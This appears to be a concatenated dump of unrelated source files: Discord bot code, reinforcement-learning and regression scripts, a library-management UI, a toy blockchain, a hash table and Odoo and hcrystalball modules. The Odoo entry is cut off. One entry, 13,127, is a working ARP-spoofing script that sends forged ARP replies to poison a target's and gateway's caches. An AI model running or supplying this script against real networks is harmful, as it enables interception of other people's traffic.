    embed.add_field(name = '__Welcome to Our Server__',value ='**Hope you will be active here. Check Our server rules and never try to break any rules. Also join our official server- https://discord.gg/vMvv5rr**',inline = False) #change_this_message_with_your_msg_that_you_wanna_ur_bot_send_in_dm_when_a_user_joins
    embed.set_image(url = 'https://media.giphy.com/media/OkJat1YNdoD3W/giphy.gif')
    await client.send_message(member,embed=embed)
    print("Sent message to " + member.name)
client.run('BOT TOKEN HERE') #add_your_bot_token_here
|
13,117 | c92050d4fcc76866e53192c74915c143e1b533d2 |
from .msgflo import *
|
13,118 | b38b1cdfc5017ab0898085bc85a70e02cbaeb8ad | import logging
import numpy as np
import pdb
import torch
import torch.nn as nn
from logger import *
from deep_q_agent import DeepQAgent
from self_play_episodes import self_play_episodes
from mdp import Connect4MDP
logger = logging.getLogger(__name__)
class Trainer:
    """
    Class for training deep q agents and tuning hyperparameters.
    Guides agent through self play to build data for training and then learns
    from random samples drawn from agent's replay_buffer.
    """
    def __init__(self, agent=DeepQAgent(), target_update_freq=100, lr=.005, lr_gamma=.9, lr_step_size=5, gamma=.95, batch_size=64, eps_max=1, eps_min=.1, eps_freq=1000, eps_decrement=.01, *args, **kwargs):
        # NOTE(review): ``agent=DeepQAgent()`` is a mutable default evaluated
        # once at import time -- every Trainer() created without an explicit
        # agent shares the SAME agent instance.  Confirm this is intended.
        self.mdp = Connect4MDP()
        self.agent = agent
        self.target_update_freq = target_update_freq
        self.optimizer = torch.optim.Adam(params=agent.policy_net.parameters(), lr=lr)
        self.scheduler = torch.optim.lr_scheduler.StepLR(self.optimizer, step_size=lr_step_size, gamma=lr_gamma, last_epoch=-1)
        self.loss_fn = nn.MSELoss()
        self.lr = lr
        self.gamma = gamma
        self.batch_size = batch_size
        self.eps_max = eps_max
        self.eps_min = eps_min
        self.eps_freq = eps_freq
        self.eps_decrement = eps_decrement
        # Linear epsilon decay with the number of learning iterations,
        # floored at eps_min.
        self.eps = lambda learning_iter: max(self.eps_min,
                                             self.eps_max - (learning_iter/self.eps_freq) * self.eps_decrement)
    def self_play(self, n_episodes):
        """
        Generate training data by playing games vs self.
        Gathers experiece tuples over n_episodes and pushes them to agent replay buffer.
        """
        eps = self.eps(self.agent.learning_iters)
        experiences = self_play_episodes(self.mdp, self.agent, n_episodes, eps)
        for state, action, reward, next_state, done in experiences:
            self.agent.replay_buffer.push(state, action, reward, next_state, done)
    def learn(self):
        """
        Update model with random batch from agent replay buffer.
        """
        batch = self.agent.replay_buffer.sample(self.batch_size)
        states = torch.tensor([x.state for x in batch], dtype=torch.float32).to(self.agent.device)  # shape == (batch_size, 3, 6, 7)
        actions = [x.action for x in batch]
        rewards = torch.tensor([x.reward for x in batch], dtype=torch.float32).to(self.agent.device)
        next_states = torch.tensor([x.next_state for x in batch], dtype=torch.float32).to(self.agent.device)
        dones = [x.done for x in batch]
        self.optimizer.zero_grad()
        q_vals = self.agent.policy_net(states)[range(len(actions)), actions]  # Q vals for actions taken
        q_next_vals = self.agent.target_net(next_states).detach()  # we don't care about grad wrt target net
        q_next_vals[dones] = 0.0  # terminal states have no future expected value
        # One-step TD target: r + gamma * max_a' Q_target(s', a').
        q_targets = rewards + self.gamma * torch.max(q_next_vals, dim=1)[0]
        # all_q_vals = self.agent.policy_net(states)
        # print()
        # print('actions')
        # print(actions)
        # print()
        # print('original all q vals')
        # print(self.agent.policy_net(states))
        # print(self.agent.policy_net(states).shape)
        # print()
        # print('QVALS:', q_vals)
        # print(q_vals.shape)
        # print('\n\n')
        # print('QTARGETS:', q_targets)
        # print(q_targets.shape)
        # breakpoint()
        loss = self.loss_fn(q_targets, q_vals).to(self.agent.device)
        loss.backward()
        # for layer in self.agent.policy_net.named_parameters():
        #     # print(f'layer: {layer[0]}')
        #     # print(f'grad:', layer[1].grad)
        #     # print('loss', loss)
        #     # print('q_vals grad:', q_vals.grad)
        #     # print('states:', )
        self.optimizer.step()
        self.agent.learning_iters += 1
        # Periodically sync the target network with the policy network.
        if self.agent.learning_iters % self.target_update_freq == 0:
            self.agent.update_target_net()
            # logger.info('Updated target net')
    def train(self, iters, n_episodes):
        """
        Train agent over given number of iterations. Each iteration consists
        of self play over n_episodes and then a learn step where agent
        updates network based on random sample from replay buffer
        """
        for i in range(iters):
            self.self_play(n_episodes)
            self.learn()
    def __repr__(self):
        return f'Trainer for {self.agent.name}'
|
13,119 | 9d69e8273d796d72ca62f868462427b5dbf4a826 | import numpy as np
import matplotlib.pyplot as plt
import gym
import gym_bandits
import matplotlib.patches as mpatches
def main():
    """Run the 10-armed Gaussian bandit experiment and plot average reward."""
    # Number of bandits
    num_of_bandits = 10
    # For each episode we will run these many iterations
    iterations = 1000
    episodes = 1000
    # Create environment - Gaussian Distribution
    env = gym.make('BanditTenArmedGaussian-v0')
    # Run all episodes
    epsilon_rewards = run_epsilon(env, num_of_bandits, iterations, episodes)
    # Plot the per-iteration reward averaged over all episodes.
    plt.figure(figsize=(12, 8))
    plt.plot(epsilon_rewards, color='red')
    plt.legend(bbox_to_anchor=(1.2, 0.5))
    plt.xlabel("Iterations")
    plt.ylabel("Average Reward")
    greedy_patch = mpatches.Patch(color='red', label='epsilon-greedy')
    plt.legend(handles=[greedy_patch])
    plt.title("Average Rewards after "
              + str(episodes) + " Episodes")
    plt.show()
def run_epsilon(env, num_of_bandits, iterations, episodes):
    """
    This method will run all the episodes with epsilon greedy strategy
    :param env: Bandit Gym Environment
    :param num_of_bandits: Number of bandit arms
    :param iterations: Iterations per episode
    :param episodes: Number of episodes
    :return: Array of length *iterations* holding the running mean reward at
        each iteration, averaged over all episodes (not one entry per episode)
    """
    # Initialize total mean rewards array per episode by zero
    epsilon_rewards = np.zeros(iterations)
    for i in range(episodes):
        print(f"Running Epsilon episode:{i}")
        # NOTE(review): n starts at 1 and is incremented *before* the first
        # mean update, so the first reward is divided by 2 and early rewards
        # are under-weighted — confirm this off-by-one is intended.
        n = 1
        # Per-arm pull counts seeded at 1 (avoids division by zero below).
        action_count_per_bandit = np.ones(num_of_bandits)
        mean_reward = 0
        total_rewards = np.zeros(iterations)
        mean_reward_per_bandit = np.zeros(num_of_bandits)
        env.reset()
        # Exploration probability for epsilon-greedy.
        epsilon = 0.5
        for j in range(iterations):
            a = get_epsilon_action(epsilon, env, mean_reward_per_bandit)
            observation, reward, done, info = env.step(a)
            # Update counts
            n += 1
            action_count_per_bandit[a] += 1
            # Update mean rewards (incremental running-average form)
            mean_reward = mean_reward + (
                reward - mean_reward) / n
            # Update mean rewards per bandit
            mean_reward_per_bandit[a] = mean_reward_per_bandit[a] + (
                reward - mean_reward_per_bandit[a]) / action_count_per_bandit[a]
            # Capture mean rewards per iteration
            total_rewards[j] = mean_reward
        # Update mean episode rewards once all the iterations of the episode are done
        # (incremental average over episodes, element-wise per iteration)
        epsilon_rewards = epsilon_rewards + (total_rewards - epsilon_rewards) / (i + 1)
    return epsilon_rewards
def get_epsilon_action(epsilon, env, mean_reward_per_bandit):
    """Pick an arm with epsilon-greedy.

    :param epsilon: Exploration probability (0 disables exploration)
    :param env: Gym environment used to sample a random action (exploration)
    :param mean_reward_per_bandit: Per-arm mean rewards used for the greedy
        choice (exploitation)
    :return: Chosen arm index
    """
    if np.random.uniform() < epsilon:
        return env.action_space.sample()
    return np.argmax(mean_reward_per_bandit)
if __name__ == "__main__":
main() |
13,120 | e2c7e8900ac6dc675a6135f4cd92bbb0e64ad17a | import lief
import yaml
import struct
# Layout of the target EXE: .text virtual base and its raw file offset.
virtualBaseAddress = 0x401000
textFileOffset = 0x400

# Parse the shared object and collect its symbol table.
binary = lief.parse("src/bayonetta.so")
symbols = binary.symbols

# link_map.yaml maps symbol names to target virtual addresses inside the EXE.
# safe_load: yaml.load() without a Loader warns on PyYAML>=5 and is a
# TypeError on PyYAML>=6.
with open("link_map.yaml", "r") as stream:
    data_loaded = yaml.safe_load(stream)

# For every mapped symbol, overwrite the EXE at the target address with a
# near jump (E9 rel32) into the injected code.
with open("out/Bayonetta.exe", "r+b") as f:
    for s in symbols:
        if data_loaded.get(s.name, False):
            target_address = data_loaded[s.name]
            print(s.name, ":", hex(target_address))
            fileAddress = target_address - virtualBaseAddress + textFileOffset
            f.seek(fileAddress)
            # rel32 is relative to the end of the 5-byte jmp instruction.
            jmpOffset = s.value - (target_address + 5)
            # BUGFIX: the file is opened in binary mode, so the opcode must be
            # bytes — "\xE9" + struct.pack(...) raised TypeError on Python 3.
            f.write(b"\xE9" + struct.pack("<l", jmpOffset))
|
13,121 | c5e6bf01689ab90a30d864069253c26545d32dcd | import numpy as np
import matplotlib.pyplot as plt
COLNUM = (0, 2, 13)
# def univariate_regression():
def read_file():
    """Parse whitespace-separated 'housing.data' in the working directory
    into a list of rows, each a list of floats."""
    with open('housing.data') as src:
        tokenized = [line.split() for line in src]
    return [[float(tok) for tok in row] for row in tokenized]
def mean_average_error(b, m, x, y):
    """Mean absolute error of the line y = m*x + b over 1xN row matrices."""
    n = float(y.shape[1])
    residuals = np.abs(y - (m * x + b))
    return np.sum(residuals) / n
def compute_error_for_line_given_points(b, m, x, y):
    """Half mean squared error of the line y = m*x + b over 1xN row matrices."""
    n = float(y.shape[1])
    squared = np.power(y - (m * x + b), 2)
    return np.sum(squared) / (n * 2)
def step_gradient(b, m, x, y, learning_rate):
    """One batch gradient-descent step for MSE on the line y = m*x + b.

    Returns the updated (b, m) pair; x and y are 1xN row matrices.
    """
    n = float(y.shape[1])
    residual = y - ((m * x) + b)
    # Gradients of the (half) MSE with respect to intercept and slope.
    b_gradient = -(1 / n) * np.sum(residual)
    m_gradient = -(1 / n) * residual * x.T
    next_b = b - (learning_rate * b_gradient)
    next_m = m - (learning_rate * m_gradient[0, 0])
    return next_b, next_m
def univariate_regression(x, y, learning_rate, num_of_iter):
    """Fit y = m*x + b by batch gradient descent.

    Returns (b, m, errors) where errors holds the half-MSE before training
    and after every iteration (num_of_iter + 1 entries).
    """
    b = 0
    m = 0
    errors = [compute_error_for_line_given_points(b, m, x, y)]
    for _ in range(num_of_iter):
        b, m = step_gradient(b, m, x, y, learning_rate)
        errors.append(compute_error_for_line_given_points(b, m, x, y))
    return b, m, errors
def main():
    """Load housing.data, fit the price column against two feature columns
    (labelled 'Crime' and 'Tax' in the plots) and show fit + error curves."""
    inputs = read_file()
    # Feature/target columns selected via COLNUM = (0, 2, 13).
    x1 = np.matrix([x[COLNUM[0]] for x in inputs])
    x2 = np.matrix([x[COLNUM[1]] for x in inputs])
    y = np.matrix([x[COLNUM[2]] for x in inputs])
    learning_rate = 0.01
    num_of_iter = 10000
    # plt.figure(1)
    # plt.plot(x1, y, 'bo')
    # plt.axis([-5, x1.max() + 5, -5, y.max() + 5])
    # plt.ylabel('Price')
    # plt.xlabel('Crime')
    #
    # plt.figure(2)
    # plt.plot(x2, y, 'bo')
    # plt.axis([-5, x2.max() + 5, -5, y.max() + 5])
    # plt.ylabel('Price')
    # plt.xlabel('Tax')
    # plt.show()
    b1, m1, errors1 = univariate_regression(x1, y, learning_rate, num_of_iter)
    b2, m2, errors2 = univariate_regression(x2, y, learning_rate, num_of_iter)
    print('-------- 1 --------')
    print('y = %fx + %f' % (m1, b1))
    # BUGFIX: np.asscalar() was removed in NumPy 1.23; float() does the same
    # scalar conversion on the NumPy scalars stored in the error history.
    print('MSE = %f' % float(errors1[-1]))
    print('MAE = %f' % mean_average_error(b1, m1, x1, y))
    print('-------- 2 --------')
    print('y = %fx + %f' % (m2, b2))
    print('MSE = %f' % float(errors2[-1]))
    print('MAE = %f' % mean_average_error(b2, m2, x2, y))
    # Figure 1: scatter + fitted line (top), error curve (bottom).
    plt.figure(1)
    plt.title('Crime')
    plt.subplot(211)
    plt.axis([0, x1.max(), 0, y.max()])
    x_arr = np.array(x1)[0]
    y_arr = np.array(y)[0]
    plt.plot(x_arr, y_arr, 'bo', x_arr, m1 * x_arr + b1, 'r')
    plt.subplot(212)
    plt.axis([0, num_of_iter, 0, errors1[0]])
    plt.xlabel('iter')
    plt.ylabel('err')
    plt.plot(errors1)
    # Figure 2: same layout for the second feature.
    plt.figure(2)
    plt.title('Tax')
    plt.subplot(211)
    plt.axis([0, x2.max(), 0, y.max()])
    x_arr = np.array(x2)[0]
    y_arr = np.array(y)[0]
    plt.plot(x_arr, y_arr, 'bo', x_arr, m2 * x_arr + b2, 'r')
    plt.subplot(212)
    plt.axis([0, num_of_iter, 0, errors2[0]])
    plt.xlabel('iter')
    plt.ylabel('err')
    plt.plot(errors2)
    plt.show()
# Script entry point.
if __name__ == "__main__":
    main()
|
13,122 | 101c03eb24aa7e26e9f7ffc641aef85193d053c3 | from Book import *
from Client import *
from Rental import *
from BookRepo import *
from ClientRepo import *
from RentalRepo import *
from Service import *
from UndoController import *
import datetime
class UI:
    """Console menu UI for the library application.

    Wires the repositories, service layer and undo controller together.
    Every handler reads console input, delegates to the service layer and
    prints domain exceptions instead of letting them propagate.
    """
    def __init__(self,BookRepo,ClientRepo,RentalRepo,Service,UndoController):
        self._bookRepo=BookRepo
        self._clientRepo=ClientRepo
        self._rentalRepo=RentalRepo
        self._service=Service
        self._undoController=UndoController
    def book_ui(self):
        """Book submenu loop: add/remove/update/list books until '0'."""
        print("1. Add book")
        print("2. Remove book")
        print("3. Update book")
        print("4. List books")
        print("0. Return")
        while True:
            option = input(">>")
            try:
                if option == "1":
                    self.add_book_ui()
                elif option == "2":
                    self.remove_book_ui()
                elif option == "3":
                    self.update_book_ui()
                elif option == "4":
                    self.list_books()
                elif option=="0":
                    self.print_menu()
                    return
                else:
                    print("Bad command")
            except BookException as be:
                print(be)
            except RentalException as re:
                print(re)
            except ServiceException as se:
                print(se)
            except UndoException as ue:
                print(ue)
    def client_ui(self):
        """Client submenu loop: add/remove/update/list clients until '0'."""
        print("1. Add a client")
        print("2. Remove a client")
        print("3. Update a client")
        print("4. List clients")
        print("0. Return")
        while True:
            option = input(">>")
            try:
                if option == "1":
                    self.add_client_ui()
                elif option == "2":
                    self.remove_client_ui()
                elif option == "3":
                    self.update_client_ui()
                elif option == "4":
                    self.list_clients()
                elif option=="0":
                    self.print_menu()
                    return
                else:
                    print("Bad command")
            except ClientException as ce:
                print(ce)
            except RentalException as re:
                print(re)
            except ServiceException as se:
                print(se)
            except UndoException as ue:
                print(ue)
    def rental_ui(self):
        """Rental submenu loop: rent/return/list rentals until '0'."""
        print("1. Rent book")
        print("2. Return book")
        print("3. List rentals")
        print("0. Return")
        while True:
            option = input(">>")
            try:
                if option == "1":
                    self.rent_book_ui()
                elif option == "2":
                    self.return_book_ui()
                elif option == "3":
                    self.list_rentals()
                elif option=="0":
                    self.print_menu()
                    return
                else:
                    print("Bad command")
            except BookException as be:
                print(be)
            except ClientException as ce:
                print(ce)
            except RentalException as re:
                print(re)
            except ServiceException as se:
                print(se)
            except UndoException as ue:
                print(ue)
    def add_book_ui(self):
        '''
        Reads the book parameters(id,title,author)
        '''
        id=input("Book ID= ")
        title=input("title= ")
        author=input("author= ")
        print(self._service.add_book(id,title,author))
    def remove_book_ui(self):
        '''
        Reads the book id for the book that will be removed
        Raises ServiceException if the id is not an integer or the id is negative
        '''
        id=input("Book ID= ")
        msg=self._service.remove_book(id)
        print(msg)
    def update_book_ui(self):
        '''
        Reads the book parameters(id,title,author) for updating the existent book of the same id with the new params.
        Raises BookException if id is not an integer
        '''
        id=input("Book ID= ")
        title=input("title= ")
        author=input("author= ")
        msg=self._service.update_book(id,title,author)
        print(msg)
    def list_books(self):
        '''
        Prints the books from the list
        '''
        if len(self._bookRepo.Books)==0:
            print("List is empty")
        for b in self._bookRepo.Books:
            print(b)
    def add_client_ui(self):
        '''
        Reads the client parameters(id,name)
        Raises ClientException in case the id is not an integer
        '''
        id=input("Client ID= ")
        name=input("Name= ")
        print(self._service.add_client(id,name))
    def remove_client_ui(self):
        '''
        Reads the client id of the client that will be removed
        Raises ClientException in case the id is not an integer or the id is negative
        '''
        id=input("Client ID= ")
        msg=self._service.remove_client(id)
        print(msg)
    def update_client_ui(self):
        '''
        Reads the client parameters(id,name) for updating the existent client of the same id with the new name
        Raises ClientException in case the id is not an integer
        '''
        id=input("Client ID= ")
        name=input("Name= ")
        msg=self._service.update_client(id,name)
        print(msg)
    def list_clients(self):
        '''
        Prints the clients from the list
        '''
        if len(self._clientRepo.Clients)==0:
            print("List is empty")
        for c in self._clientRepo.Clients:
            print(c)
    def list_rentals(self):
        """Prints every rental in the repository."""
        for r in self._rentalRepo._rentalList:
            print(r)
    def list_rentals_client(self,listC):
        """Prints the rentals in the given client-specific list."""
        for r in listC:
            print(r)
    def rent_book_ui(self):
        """Reads rental id, client id, book id and the rental date, then
        delegates the rental to the service layer."""
        id = input("ID rental: ")
        idc=input("ID Client: ")
        idb=input("ID book: ")
        day=input("Day the rental took place: ")
        month=input("Month the rental took place(number): ")
        year=input("Year the rental took place: ")
        print(self._service.rent_book(id,idb,idc,day,month,year))
    def return_book_ui(self):
        """Lists a client's open rentals, then reads which rental to close
        and the return date, delegating the return to the service layer."""
        idc=input("ID client: ")
        idc=self._service.validate_return_idc(idc)
        rentals=self._rentalRepo.get_rentals(idc)
        if rentals==[]:
            print("There is no rental to be completed!")
            return
        self.list_rentals_client(rentals)
        id=input("ID rental for return: ")
        returnDay=input("Day the book was returned: ")
        returnMonth=input("Month the book was returned(number): ")
        returnYear=input("Year the book was returned: ")
        print(self._service.return_book(rentals,id,idc,returnDay,returnMonth,returnYear))
    def find_book_ui(self):
        """Book search submenu: look up books by id, title or author."""
        print("1. Find by id")
        print("2. Find by title")
        print("3. Find by author")
        print("0. Return")
        while True:
            option = input(">>")
            try:
                if option == '1':
                    id = input("ID= ")
                    if id.isdigit() == False:
                        raise BookException("ID must be an integer")
                    id = int(id)
                    print(self._bookRepo.find_book_id(id))
                elif option == '2':
                    title = input("Title= ")
                    if title == "":
                        raise BookException("Title cannot be empty")
                    findList = []
                    findList.extend(self._bookRepo.find_book_title(title))
                    for b in findList:
                        print(b)
                elif option == '3':
                    author = input("Author= ")
                    if author == "":
                        raise BookException("Author cannot be empty")
                    findList = []
                    findList.extend(self._bookRepo.find_book_author(author))
                    for b in findList:
                        print(b)
                elif option=='0':
                    self.print_menu()
                    return
                else:
                    print("Bad command")
            except BookException as be:
                print(be)
            except RentalException as re:
                print(re)
            except ServiceException as se:
                print(se)
            except UndoException as ue:
                print(ue)
    def find_client_ui(self):
        """Client search submenu: look up clients by id or name."""
        print("1. Find by id")
        print("2. Find by name")
        print("0. Return")
        while True:
            option=input(">>")
            try:
                if option=='1':
                    id=input("ID= ")
                    if id.isdigit()==False:
                        raise ClientException("ID must be an integer")
                    id=int(id)
                    print(self._clientRepo.find_client_id(id))
                elif option=='2':
                    name=input("Name= ")
                    if name=="":
                        raise ClientException("Name cannot be empty")
                    findList=[]
                    findList.extend(self._clientRepo.find_client_name(name))
                    for c in findList:
                        print(c)
                elif option=='0':
                    self.print_menu()
                    return
                else:
                    print("Bad command")
            except ClientException as ce:
                print(ce)
            except RentalException as re:
                print(re)
            except ServiceException as se:
                print(se)
            except UndoException as ue:
                print(ue)
    def most_rented_books_ui(self):
        """Prints the most rented books, as computed by the service layer."""
        for b in self._service.most_rented_books():
            print(b)
    def most_active_clients_ui(self):
        """Prints the most active clients, as computed by the service layer."""
        for c in self._service.most_active_clients():
            print(c)
    def most_rented_authors_ui(self):
        """Prints the most rented authors, as computed by the service layer."""
        for a in self._service.most_rented_authors():
            print(a)
    def statistics_ui(self):
        """Statistics submenu loop until '0'."""
        print("1. Most rented books")
        print("2. Most active clients")
        print("3. Most rented author")
        print("0. Return")
        while True:
            option=input(">>")
            try:
                if option == '1':
                    self.most_rented_books_ui()
                elif option == '2':
                    self.most_active_clients_ui()
                elif option == '3':
                    self.most_rented_authors_ui()
                elif option=='0':
                    self.print_menu()
                    return
                else:
                    print("Bad command")
            except BookException as be:
                print(be)
            except ClientException as ce:
                print(ce)
            except RentalException as re:
                print(re)
            except ServiceException as se:
                print(se)
            except UndoException as ue:
                print(ue)
    def print_menu(self):
        """Prints the top-level menu."""
        print("1. Book menu")
        print("2. Client menu")
        print("3. Rental menu")
        print("4. Find a book")
        print("5. Find a client")
        print("6. Statistics")
        print("7. Undo")
        print("8. Redo")
        print("0. Exit")
    def start(self):
        """Main loop: dispatches top-level menu choices until '0' (exit)."""
        self.print_menu()
        while True:
            choice=input(">>")
            try:
                if choice=="1":
                    self.book_ui()
                elif choice=="2":
                    self.client_ui()
                elif choice=="3":
                    self.rental_ui()
                elif choice=="4":
                    self.find_book_ui()
                elif choice=="5":
                    self.find_client_ui()
                elif choice=="6":
                    self.statistics_ui()
                elif choice=="7":
                    self._undoController.undo()
                elif choice=="8":
                    self._undoController.redo()
                elif choice=="0":
                    return
                else:
                    print("Bad command")
            except BookException as be:
                print(be)
            except ClientException as ce:
                print(ce)
            except RentalException as re:
                print(re)
            except ServiceException as se:
                print(se)
            except UndoException as ue:
                print(ue)
13,123 | e73aedd957073c92475bbf71c46b5e340f9a49b4 | import json
# Parse a small JSON document and show the resulting dict.
json_string = u'{ "id":"mark@foo.com" }'
obj = json.loads(json_string)
# BUGFIX: `print obj` is a Python 2 print statement and a SyntaxError on
# Python 3; the call form works on both interpreters.
print(obj)
13,124 | d86054682110428a0074e3db853fa6bb5cd82340 | import jsons
from block import Block
# Basically just a linked list
from blockchain import Blockchain
# Save the block to the filesystem
def save_block(block):
    """Serialize *block* to chaindata/<blockNo>.json as valid JSON."""
    import os
    chaindata_dir = 'chaindata'
    # Robustness: create the output directory on first use instead of
    # failing with FileNotFoundError.
    os.makedirs(chaindata_dir, exist_ok=True)
    # Generate filename by interpolating a string, will be saved as json
    # i.e chaindata/42.json is block 42 in the chaindata folder
    filename = '%s/%s.json' % (chaindata_dir, block.blockNo)
    print(filename)
    # The with statement guarantees the file is closed however the body exits.
    with open(filename, 'w') as block_file:
        print(block)
        # BUGFIX: str(jsons.dump(block)) wrote a Python dict repr (single
        # quotes) — not parseable JSON. jsons.dumps produces a JSON string.
        block_file.write(jsons.dumps(block))
# Execute our blockchain
blockchain = Blockchain()
# Mine 3 blocks (the old comment said 10, but range(3) mines three)
for n in range(3):
    blockchain.mine(Block("Block " + str(n + 1)))
# Iterate through the blockchain, printing and saving every block.
# NOTE(review): this loop reassigns blockchain.head, so it destroys the
# chain while walking it — confirm the chain is not needed afterwards.
while blockchain.head is not None:
    print(blockchain.head)
    save_block(blockchain.head)
    blockchain.head = blockchain.head.next
|
13,125 | b5f7e514bf1195bd904b28cf0c9a20e63f338e4b | class NativeDictionary:
def __init__(self, sz):
self.size = sz
self.slots = [None] * self.size
self.values = [None] * self.size
def hash_fun(self, key):
    # Keys are strings; always returns a valid slot index.
    # If the key is already stored, return its current slot so that callers
    # address the bucket where the key actually lives.
    if self.is_key(key):
        return self.slots.index(key)
    try:
        # Home slot derived from the UTF-8 byte length of the key.
        index = len(key.encode('utf-8')) % self.size
        return index
    except ZeroDivisionError:
        # size == 0: fall back to slot 0 (the table is unusable anyway).
        return 0
def is_key(self, key):
    """Return True if *key* is currently stored in the table, else False."""
    return key in self.slots
def put(self, key, value):
    """Store *value* under *key*.

    Overwrites in place when the key already exists; otherwise linear-probes
    for a free bucket, starting one past the home slot. Silently drops the
    pair when the table is full (matching the original contract).
    """
    if self.is_key(key):
        self.values[self.slots.index(key)] = value
        return None
    start = self.hash_fun(key)
    # Probe start+1, start+2, ..., start+size (wrapping), i.e. size probes.
    for step in range(1, self.size + 1):
        probe = (start + step) % self.size
        if self.slots[probe] is None:
            self.slots[probe] = key
            self.values[probe] = value
            return None
    return None
def get(self, key):
    """Return the value stored under *key*, or None when the key is absent."""
    if key in self.slots:
        return self.values[self.slots.index(key)]
    return None
|
13,126 | 4204bbb18ca3b855278c0f39ddd1c82d5f7a21cd | import argparse
import sys
from scapy.all import *
from uuid import getnode
def find_my_IP_and_MAC():
    """Return (local MAC, local IP).

    Sends an ICMP echo with ttl=0 so the gateway replies with a TTL-exceeded
    ICMP error; the probe's dst field on the reply carries our own IP.
    NOTE(review): sr1(..., timeout=5) returns None on timeout, in which case
    p.dst raises AttributeError — confirm that is acceptable.
    """
    # Local MAC derived from uuid.getnode(), formatted aa:bb:cc:dd:ee:ff.
    mac = ':'.join(re.findall('..', '%012x' % getnode()))
    # NOTE(review): the original comment claimed an IP was used "to save
    # time", but a domain name is used here, so a DNS lookup happens.
    p = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX",verbose=0,timeout=5) # verbose=0: no output
    return mac,p.dst
def get_GW():
    """Return the default gateway's IP.

    Sends an ICMP echo with ttl=0 so the gateway answers with a TTL-exceeded
    ICMP error; the source of that reply is the gateway itself.
    """
    p = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX",verbose=0)
    return p.src
def find_mac_by_ip(ip):
    """Send an ARP who-has query for *ip* and return the answering MAC."""
    result = sr1(ARP(op=ARP.who_has, pdst=ip),verbose=0)
    return result.hwsrc  # the MAC address of the responder
def create_arp_response_packet(ipSrc,macSrc,ipDst,macDst):
    """Forged ARP is-at reply claiming ipSrc is at macSrc, sent to ipDst/macDst."""
    return ARP(op=ARP.is_at, psrc=ipSrc, hwsrc=macSrc, hwdst=macDst, pdst=ipDst)
# Resolve our own addressing and the gateway once, at import time.
myMac, myIp =find_my_IP_and_MAC()
ipGW=get_GW()

parser = argparse.ArgumentParser(description='Process some arguments.')
parser.add_argument("-i" ,"--iface", type=str, default='enp0s3',
                    help="The attack interface")
parser.add_argument("-s" ,"--src", type=str, default=myIp,
                    help="The address you want for the attacker")
parser.add_argument("-d" ,"--delay", type=float, default=1,
                    help="Delay (in seconds) between messages")
parser.add_argument("-gw" ,"--gateway", action='count', default=0,
                    help="should GW be attacked as well")
# Separate the arguments into optional and required groups.
required = parser.add_argument_group('required arguments')
required.add_argument("-t" ,"--target", type=str,
                      help="The attacked ip", required=True)
args = parser.parse_args()
def attack_ip(ip, delay):  # both sides
    """Poison the gateway's ARP cache so traffic for *ip* reaches us.

    NOTE(review): macVic is resolved but never used and the reverse-direction
    packet is commented out, so despite the name this poisons only one
    direction — confirm whether that is intended.
    """
    macVic = find_mac_by_ip(ip)
    macSrc, ipSrc = find_my_IP_and_MAC()
    # create packets
    macGW = find_mac_by_ip(ipGW)
    pck = [create_arp_response_packet(ip, macSrc, ipGW, macGW)] # create a list with one packet
    # pck.append(create_arp_response_packet(ipGW, macSrc, ip, macVic))
    send(pck,count=50, inter=delay, loop=1)
def main():
    """Resolve victim/source addresses from the CLI and send spoofed ARP replies."""
    macVic = find_mac_by_ip(args.target)
    macSrc, ipSrc = find_my_IP_and_MAC()
    # Honour a user-supplied spoofed source address (-s).
    if ipSrc != args.src:
        ipSrc = args.src
        macSrc = find_mac_by_ip(ipSrc)
        print('src change')  # call form works on Python 2 and 3
    # With -gw, poison both directions: gateway's view of the target and
    # the target's view of the gateway.
    if args.gateway > 0:
        macGW = find_mac_by_ip(ipGW)
        pck = [create_arp_response_packet(args.target, macSrc, ipGW, macGW)]  # list with one packet
        pck.append(create_arp_response_packet(ipGW, macSrc, args.target, macVic))
    else:
        # BUGFIX: this branch previously used the module-level myMac,
        # silently ignoring an -s override that the -gw branch honoured;
        # use the resolved macSrc consistently.
        pck = create_arp_response_packet(ipGW, macSrc, args.target, macVic)
    send(pck, inter=args.delay, loop=2)
if __name__=="__main__":
main()
|
13,127 | 7d7c0e7c09cb371221e46cb3aaee6f19c2eba6fd | from ._sklearn import get_sklearn_wrapper as get_sklearn_wrapper
from sklearn import set_config
from hcrystalball.utils import optional_import

# Show all estimator parameters in repr(), not only non-default ones.
set_config(print_changed_only=False)

# Wrappers with heavy optional dependencies are exported only when their
# backing package imports cleanly; optional_import registers the name in
# globals() and returns the names to append to __all__.
__all__ = ["get_sklearn_wrapper"]
__all__.extend(optional_import("hcrystalball.wrappers._prophet", "ProphetWrapper", globals()))
__all__.extend(
    optional_import("hcrystalball.wrappers._statsmodels", "ExponentialSmoothingWrapper", globals())
)
__all__.extend(optional_import("hcrystalball.wrappers._statsmodels", "SimpleSmoothingWrapper", globals()))
__all__.extend(optional_import("hcrystalball.wrappers._statsmodels", "HoltSmoothingWrapper", globals()))
__all__.extend(optional_import("hcrystalball.wrappers._statsmodels", "ThetaWrapper", globals()))
__all__.extend(optional_import("hcrystalball.wrappers._sarimax", "SarimaxWrapper", globals()))
__all__.extend(optional_import("hcrystalball.wrappers._tbats", "TBATSWrapper", globals()))
__all__.extend(optional_import("hcrystalball.wrappers._tbats", "BATSWrapper", globals()))
|
13,128 | bb5f1d340a940b85f047a6925e352013183984b5 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models, _
from odoo.exceptions import UserError, ValidationError
from datetime import datetime
import pytz
class CrmTeam(models.Model):
    """Extends crm.team with Point-of-Sale KPIs (open sessions, sale totals)."""
    _inherit = 'crm.team'

    # POS configurations attached to this sales team.
    pos_config_ids = fields.One2many('pos.config', 'crm_team_id', string="Point of Sales")
    pos_sessions_open_count = fields.Integer(string='Open POS Sessions', compute='_compute_pos_sessions_open_count')
    pos_order_amount_total = fields.Float(string="Session Sale Amount", compute='_compute_pos_order_amount_total')

    def _compute_pos_sessions_open_count(self):
        """Count the currently opened POS sessions of each team."""
        for team in self:
            team.pos_sessions_open_count = self.env['pos.session'].search_count([('config_id.crm_team_id', '=', team.id), ('state', '=', 'opened')])

    def _compute_pos_order_amount_total(self):
        """Sum the sales of opened sessions per team, using one grouped query."""
        data = self.env['report.pos.order'].read_group([
            ('session_id.state', '=', 'opened'),
            ('config_id.crm_team_id', 'in', self.ids),
        ], ['price_total:sum', 'config_id'], ['config_id'])
